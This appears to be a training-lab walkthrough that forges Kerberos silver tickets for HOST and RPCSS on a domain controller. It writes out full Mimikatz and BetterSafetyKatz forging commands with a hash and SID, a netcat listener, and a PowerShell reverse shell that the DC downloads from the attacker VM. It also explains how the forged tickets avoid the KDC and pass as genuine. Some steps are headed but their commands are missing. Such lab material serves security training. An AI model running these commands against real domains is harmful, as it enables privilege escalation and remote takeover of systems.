Obj 9 Silver Ticket for Host

Task: Get command execution on the DC by creating a silver ticket for the HOST service (Part 1, via a scheduled task) and for HOST plus RPCSS (Part 2, via WMI).


Run one of the following commands from an elevated shell. The /rc4 value is the NTLM hash of the target machine account (dcorp-dc$): HOST service tickets for the DC are encrypted with that key, so it is all that is needed to forge one. /startoffset, /endin and /renewmax are in minutes; 600 and 10080 match the default 10-hour ticket lifetime and 7-day renewal limit, so the forged ticket looks like an ordinary one in the cache.

Silver Ticket - BetterSafetyKatz

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Silver Ticket - Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Start a netcat listener on the student VM:

nc64.exe -lvnp 443

We need a modified copy of the reverse shell script that calls itself when loaded, so that a plain download cradle on the DC is enough to start the shell:

Create a copy of Invoke-PowerShellTcp.ps1 and rename it Invoke-PowerShellTcpEx.ps1.
- Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (right-click it and choose Edit).
- Add the line Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443 to the end of the file.

Remember to serve the new file with HFS.exe (or any HTTP server) on the student VM so the DC can download it.

Now, let's create a task on the DC that downloads and runs our new script. Because the HOST ticket is in our cache, the task scheduler on the DC accepts the connection as Administrator.

Now we can run the task to execute our script.

We should get a callback on our listener as NT AUTHORITY\SYSTEM, since the task runs under that account.

- PART 2 - The same result as above, reached another way (WMI instead of a scheduled task).

For accessing WMI we need two tickets: one for the HOST service and another for RPCSS. HOST covers the WMI service itself (it has no SPN of its own) and RPCSS covers the RPC endpoint mapper that DCOM activation goes through. Run the commands below from an elevated shell:

Create Silver Ticket

Inject a ticket for RPCSS

Check with klist that both tickets are present (output trimmed):

#0> Client: Administrator @ dollarcorp.moneycorp.local
    Server: RPCSS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
    KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
    Start Time: 11/16/2021 13:36:23 (local)
    End Time: 11/16/2021 23:36:23 (local)
    Renew Time: 11/23/2021 13:36:23 (local)
    Session Key Type: RSADSI RC4-HMAC(NT)
    Cache Flags: 0
    Kdc Called:

#1> Client: Administrator @ dollarcorp.moneycorp.local
    Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local

Note the empty "Kdc Called:" field and the 10-hour / 7-day lifetimes: the tickets were forged locally and injected, so no TGS-REQ ever reached the DC, and the lifetimes match what a genuine ticket would show.

Now we can run WMI commands against the DC.
